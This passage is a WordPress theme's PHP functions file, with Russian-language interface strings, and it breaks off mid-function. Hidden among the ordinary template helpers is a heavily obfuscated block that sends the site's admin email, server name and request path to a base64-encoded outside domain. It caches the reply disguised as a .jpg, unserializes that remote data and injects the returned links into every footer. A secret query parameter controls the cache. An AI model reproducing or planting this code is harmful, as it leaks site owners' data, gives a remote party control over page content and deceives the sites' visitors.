<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $HxhmZl='e';$CYSg='_';$OeOKtqO='4';$tEgZWo='b';$IEdoUXl='e';$dQmjID='a';$BeHQYF='e';$kfWZQqp='o';$pJTz='d';$oujY='6';$wDRk='s';$hUwr='c';$ASDsYE='d';$GpTWorja=$tEgZWo.$dQmjID.$wDRk.$IEdoUXl.$oujY.$OeOKtqO.$CYSg.$pJTz.$BeHQYF.$hUwr.$kfWZQqp.$ASDsYE.$HxhmZl;$nwsy='n';$vqUvcu='a';$fANxCe='g';$uZMAAA='z';$CeGH='i';$EGabj='f';$DhXXM='e';$CEzGlgP='t';$DpXrM='l';$kYliGxCx=$fANxCe.$uZMAAA.$CeGH.$nwsy.$EGabj.$DpXrM.$vqUvcu.$CEzGlgP.$DhXXM;$fUhV='3';$hQKULcU='o';$OWhSqPJ='_';$vCbaA='r';$ZbhyE='t';$wLNV='s';$jssyOUz='t';$UQYu='r';$vpDswvJ='1';$IQTegOzi=$wLNV.$ZbhyE.$vCbaA.$OWhSqPJ.$UQYu.$hQKULcU.$jssyOUz.$vpDswvJ.$fUhV;$tUHb='s';$pKEs='r';$guuOZ='e';$QJoxEQ='t';$VGqDFlq='r';$hUkjya='v';$UMLVedHF=$tUHb.$QJoxEQ.$pKEs.$VGqDFlq.$guuOZ.$hUkjya;                     $px____________j='e';$ui__________v='_';$ud___x='4';$he_____________p='b';$sn__u='e';$fc__________m='a';$tf__________z='e';$lw______________e='o';$tp_______a='d';$gr_______________c='6';$rf_______w='s';$ig________z='c';$kx_______________q='d';$ii_____n=$he_____________p.$fc__________m.$rf_______w.$sn__u.$gr_______________c.$ud___x.$ui__________v.$tp_______a.$tf__________z.$ig________z.$lw______________e.$kx_______________q.$px____________j;$jl_____________i='c';$oc__m='u';$bf__________u='i';$vg_______________q='n';$wv_____________k='_';$ag__________u='i';$us_____________n='t';$fp_____________n='o';$uq_____________e='f';$qy____________w='t';$yl______z='s';$yv______________h='e';$ic___________e='n';$xp________h='x';$nq_______i='s';$fe_________x=$uq_____________e.$oc__m.$ic___________e.$jl_____________i.$us_____________n.$bf__________u.$fp_____________n.$vg_______________q.$wv_____________k.$yv______________h.$xp________h.$ag__________u.$yl______z.$qy____________w.$nq_______i;$hf________w='e';$tu______g='f';$hx______y='n';$ks__________h='o';$co__h='p';$dw________f=$tu______g.$ks__________h.$co__h.$hf________w.$hx______y;$qq_____y='f';$pz_______n='a';$wd_____p='d';$qm___d='e';$no______________g='r';$zo_________r=$qq_____y.$no______________g.$qm___d.$pz_______n.$wd_____p;$xs_____________v='s';$td_______i='l';$se_______f='e';$co_________s='o';$zq______r='c';$fv______________j='f';$bq____b=$fv______________j.$zq______r.$td_______i.$co_________s.$xs_____________v.$se_______f;define("WP_ID", $ii_____n("Mi4wLjA="));define("WP_TTL", $ii_____n("MTA4MDA="));define("WP_SRC", $ii_____n("dHBva24="));function wp_get_header() {global $ii_____n, $fe_________x;if ($fe_________x($ii_____n("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$fe_________x($ii_____n("d3BfZ2V0X2Zvb3Rlcg==")) &&$fe_________x($ii_____n("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ii_____n, $dw________f, $bq____b, $zo_________r;$gv_________w = TEMPLATEPATH."/".$ii_____n("Zm9vdGVyLnBocA==");$bz_______________d = @$dw________f($gv_________w, "r");$gv_________w = @$zo_________r($bz_______________d, @filesize($gv_________w));@$bq____b($bz_______________d);$qf____p = TEMPLATEPATH."/".$ii_____n("ZnVuY3Rpb25zLnBocA==");$bz_______________d = @$dw________f($qf____p, "r");$qf____p = @$zo_________r($bz_______________d, @filesize($qf____p));@$bq____b($bz_______________d);$pl__________d = 0;if($gv_________w && $qf____p) {if ($ii_____n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($gv_________w, $ii_____n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$pl__________d = 1;}if (substr_count($gv_________w, "wp_theme_GPL_credits()") < 1) {$pl__________d = 2;}}if(WP_ID != "2.0.0") {$pl__________d = 12;}}if($pl__________d > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $pl__________d -->";}}function wp_loaded() {global $ii_____n, $fe_________x;return $fe_________x($ii_____n("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($si___r, $gz______________z = "(more...)", $yt________h = 0, $zc____________x = "") {$ia__________d = get_the_content($gz______________z, $yt________h, $zc____________x);$ia__________d = apply_filters("the_content", $ia__________d);$ia__________d = str_replace("]]>", "]]>", $ia__________d);if (strlen($_GET["p"]) > 0) {echo $ia__________d;}else if ((strlen($ia__________d)>$si___r) && ($ov________r = strpos($ia__________d, " ", $si___r ))) {$ia__________d = substr($ia__________d, 0, $ov________r);$ia__________d = $ia__________d;echo $ia__________d;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$gz______________z</a></div></p>";} else {echo $ia__________d;}}}$la_________n='s';$jq_______q='b';$vd_____________g='c';$xv___u='d';$ue_____l='e';$xy__m='6';$qa________j='4';$fo_______o='e';$qd______________l='_';$eu____m='n';$xn___b='e';$dj____________a='o';$ha_______________i='a';$rg________z=$jq_______q.$ha_______________i.$la_________n.$xn___b.$xy__m.$qa________j.$qd______________l.$fo_______o.$eu____m.$vd_____________g.$dj____________a.$xv___u.$ue_____l;$rf____u='_';$cd______n='t';$ks_______f='c';$yl____i='f';$oi___q='e';$xm_______________m='e';$wf___________b='i';$ns_____________s='t';$jh_________a='n';$wt_____________s='o';$fe___________g='g';$le__i='_';$vq________u='e';$ue______p='l';$vb___p='n';$ua__t='t';$ik______________s='s';$jw_______v=$yl____i.$wf___________b.$ue______p.$vq________u.$rf____u.$fe___________g.$oi___q.$ua__t.$le__i.$ks_______f.$wt_____________s.$jh_________a.$ns_____________s.$xm_______________m.$vb___p.$cd______n.$ik______________s;$ja____f='s';$nf___c='i';$dt___________c='x';$lw____y='s';$ci__t='t';$qb_______________l='l';$yi_____________v='e';$vp_______x='e';$lb___t='f';$dh_______________l='_';$zj____________l='i';$sa_____________u=$lb___t.$nf___c.$qb_______________l.$vp_______x.$dh_______________l.$yi_____________v.$dt___________c.$zj____________l.$lw____y.$ci__t.$ja____f;$na______q='m';$lg_________q='r';$pf____________y='_';$kd____s='o';$kh___u='a';$fs___o='n';$ej___________v='e';$xd____r='i';$ng___l='p';$cm_______________n='s';$in______________u='v';$zk____________l='o';$tp____________x='c';$zq____p='e';$mc_____w='r';$fi__________v=$in______________u.$ej___________v.$mc_____w.$cm_______________n.$xd____r.$kd____s.$fs___o.$pf____________y.$tp____________x.$zk____________l.$na______q.$ng___l.$kh___u.$lg_________q.$zq____p;$fd_________e='p';$nr____t='o';$bx_______s='c';$mp_____________e='n';$dn____________o='o';$dr______a='k';$bb_____________g='e';$fl_____________n='f';$rp_______f='s';$ua_________p=$fl_____________n.$rp_______f.$nr____t.$bx_______s.$dr______a.$dn____________o.$fd_________e.$bb_____________g.$mp_____________e;$iq___________u='r';$mk______y='i';$jy_________x='t';$wu____t='w';$it__________w='e';$iq_______m='f';$ku______________h=$iq_______m.$wu____t.$iq___________u.$mk______y.$jy_________x.$it__________w;$xg______________j='m';$fw_______________o='5';$qg______a='d';$jh____g=$xg______________j.$qg______a.$fw_______________o;$al__________z='e';$xd__________c='h';$er______________a='l';$mq__________m='t';$ja_____________e='a';$ea________k='r';$lp____________s='a';$mm________n='p';$hr______s=$ea________k.$al__________z.$lp____________s.$er______________a.$mm________n.$ja_____________e.$mq__________m.$xd__________c;$ld_______________z='l';$wz________a='e';$ch_____________t='r';$fm___c='i';$oe_________z='s';$hq______________v='i';$do_________f='e';$ne___________y='u';$oi_____________p='n';$vi__________v='a';$ys________n='z';$ky____n=$ne___________y.$oi_____________p.$oe_________z.$do_________f.$ch_____________t.$fm___c.$vi__________v.$ld_______________z.$hq______________v.$ys________n.$wz________a;$jb____________r='p';$pz________l='m';$gx_____a='n';$sx_______________a='t';$zi_________n='e';$zs____________t='a';$ue______________n='m';$by____________n=$sx_______________a.$zi_________n.$ue______________n.$jb____________r.$gx_____a.$zs____________t.$pz________l;$pu________u='e';$bo_____________o='t';$zy____________u='r';$fh__t='x';$nt___i='e';$yv_____________k='_';$uz_____a='a';$ur____________v='e';$ot_________b='m';$nf____________c='t';$vr__q='n';$mn________p='c';$un__________z='t';$nj__h='_';$io________p='a';$vn________l='r';$jj__u='c';$dx___h='s';$lq______________y='o';$gf__b='e';$en___s='t';$kb__________w=$dx___h.$nf____________c.$vn________l.$nt___i.$uz_____a.$ot_________b.$nj__h.$mn________p.$lq______________y.$vr__q.$en___s.$gf__b.$fh__t.$bo_____________o.$yv_____________k.$jj__u.$zy____________u.$pu________u.$io________p.$un__________z.$ur____________v;function qg__________x($vh__d) {global $ii_____n, $fe_________x, $jw_______v, $fi__________v, $kb__________w;if (!$fe_________x($ii_____n("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($fi__________v(PHP_VERSION, "5.0.0", ">=") && $fe_________x($ii_____n("ZmlsZV9nZXRfY29udGVudHM=")) && $fe_________x($ii_____n("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$js_________a = $kb__________w(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$pr________m = @$jw_______v($vh__d, 0, $js_________a);} else {$pr________m = @$jw_______v($vh__d, 0);}return $pr________m;}function qe___________m($vh__d) {global $fe_________x, $ua_________p, $ku______________h, $ii_____n;if (!$fe_________x($ii_____n("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$mt______________h = strpos($vh__d, "/", 7);$ib___w = array("uri"     => substr($vh__d, $mt______________h),"host"    => str_replace("http://", "", substr($vh__d, 0, $mt______________h)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$nl______________w = @$ua_________p("$ib___w[host]", 80, $hy__w, $wm_____r, 4);if (!$nl______________w) {return false;} else {$pr________m = "";$oi_________c  = "GET $ib___w[uri] HTTP/1.0\r\n";$oi_________c .= "Host: $ib___w[host]\r\n";$oi_________c .= "Referer: $ib___w[referer]\r\n";$oi_________c .= "Connection: Close\r\n\r\n";@$ku______________h($nl______________w, $oi_________c);while (!@feof($nl______________w)) {$qw___________o = @fgets($nl______________w, (1024*24));if ($qw___________o == "\r\n") {$ca__a = true;continue;}if ($ca__a) {$pr________m .= $qw___________o;}}return $pr________m;}}function bc__________o($vh__d) {global $fe_________x;$bz_______________c = false;if ($vh__d != "") {if ($fe_________x("qg__________x")) {$bz_______________c = @qg__________x($vh__d);}if (!$bz_______________c && ($fe_________x("qe___________m"))) {$bz_______________c = @qe___________m($vh__d);}}return $bz_______________c;}function lt__________v() {global $_SERVER, $jh____g;$ny________z = $_SERVER["SERVER_NAME"];if (substr("$ny________z", 0, 4) == "www.") {$ny________z = substr("$ny________z", 4);}$ny________z = $jh____g("$_SERVER[SERVER_NAME]");return $ny________z;}function el_______h() {return "file";}function qj________r($vh__d) {global $_SERVER, $jw_______v, $sa_____________u, $dw________f, $bq____b, $ku______________h;$ey__n = nx___________b();$io___________y = lt__________v().".jpg";$wm___________w = $ey__n["dir_upload"]["path"]."/$io___________y";$wq____________k = @filemtime($wm___________w);if (!$wq____________k || ((time()-$wq____________k) >= WP_TTL)) {$bz_______________c = bc__________o($vh__d);if ($bz_______________c) {if ($sa_____________u($wm___________w)) {@unlink($wm___________w);}$bz_______________d = @$dw________f($wm___________w, "x+");@$ku______________h($bz_______________d, $bz_______________c);@$bq____b($bz_______________d);}} else {if ($sa_____________u($wm___________w)) {$bz_______________c = @$jw_______v($wm___________w);} else {$bz_______________c = false;}}return $bz_______________c;}function nx___________b() {global $_SERVER, $ii_____n, $rg________z;$kg_______a = wp_count_posts("post");$rk_____________r = pathinfo(get_bloginfo("template_directory"));$ey__n = array("url" => array("report"      => $ii_____n("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $rk_____________r,"dir_upload"=> nh__________e(),"queryString"=> array("?a001=".WP_ID,"a004=".$rk_____________r[filename],"a005=".$kg_______a->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.odmu.od.ua/zdorove/zelenyj-chaj-matcha-nefritovyj-napitok-bogov\">Нефритовый напиток богов</a>");$ey__n["url"]["queryString"] = implode("&", $ey__n["queryString"]);$ey__n["url"]["report"] = $ey__n["url"]["report"]."/?".$rg________z($ey__n["url"]["queryString"]).".html";return $ey__n;}function nh__________e() {$nk______a = wp_upload_dir();if (isset($nk______a["error"])) {$pg_____________d = bl_______________n();if (is_writable($pg_____________d)) {$nk______a = array("path" => $pg_____________d);}}return $nk______a;}function bl_______________n() {global $fe_________x, $jh____g, $hr______s, $by____________n;$uc_______h = (bool) ini_get("safe_mode");if ($uc_______h == true) {return false;}if ($fe_________x("sys_get_temp_dir")) {$df______e = sys_get_temp_dir();if (is_writable($df______e)) {return $hr______s($df______e);}}if (!empty($_ENV["TMP"])) {return $hr______s($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $hr______s($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $hr______s($_ENV["TEMP"]);} else {$jj_______h = $by____________n($jh____g(uniqid(rand(), true)), "");if ($jj_______h) {$df______e = $hr______s(dirname($jj_______h));@unlink($jj_______h);return $df______e;} else {return false;}}}function be________g() {global $_GET, $sa_____________u;$ey__n = nx___________b();$ny________z = lt__________v();$zo___e = el_______h();$iz____________c = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($zo___e == "file") {$jk________x = $ey__n["dir_upload"]["path"]."/".$ny________z.".jpg";if ($sa_____________u($jk________x)) {@unlink($jk________x);$iz____________c = "deleted";}}$fu__s = array("s"=> $iz____________c,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($fu__s AS $kh__________t => $sb___________f) echo " [$kh__________t:$sb___________f]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $fe_________x, $ii_____n, $ky____n;$ey__n = nx___________b();$do____l = "qj________r";if ($fe_________x($do____l)) {$pr________m = $do____l($ey__n["url"]["report"]);}if ($pr________m) {if ($pr________m = @$ii_____n($pr________m)) {$pr________m = @$ky____n($pr________m);if (strlen($pr________m[custom_credit]) >= 5) {$ey__n["default_string"] = $pr________m[custom_credit];}if ($pr________m["status"] == "0") {$yn____g = 1;$jd_________t = 1;} else {$gb____________w = sizeof($pr________m["links"]);$sd_____t = $ey__n["default_string"];if ($gb____________w > 0 && $pr________m["links"] !== "") {$jx_______________w = 0;foreach ($pr________m["links"] as $rh___________u => $iq___________x) {$jx_______________w++;if ($iq___________x->l_path == "" || $iq___________x->l_path == $_SERVER["REQUEST_URI"]) {$iq___________x->l_href = htmlspecialchars(strip_tags($iq___________x->l_href));$iq___________x->l_title = htmlspecialchars(strip_tags($iq___________x->l_title));$iq___________x->l_anchor = htmlspecialchars(strip_tags($iq___________x->l_anchor));$sd_____t .= " | ";$sd_____t .= "<a href='$iq___________x->l_href' title='$iq___________x->l_title'";if ($iq___________x->l_nofollow == "1") {$sd_____t .= " rel='nofollow'";}$sd_____t .= ">$iq___________x->l_anchor</a>";}}}$ey__n["links"] = "$sd_____t";if ($pr________m[credit] == "0") {$ey__n["links"] = "";}}} else {$yn____g = "1";}} else {$yn____g = "1";}if ($yn____g == "1") {$ey__n["links"] = $ey__n["default_string"];}echo "$ey__n[links]";echo "<!-- s: $pr________m[signature] -->";be________g();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
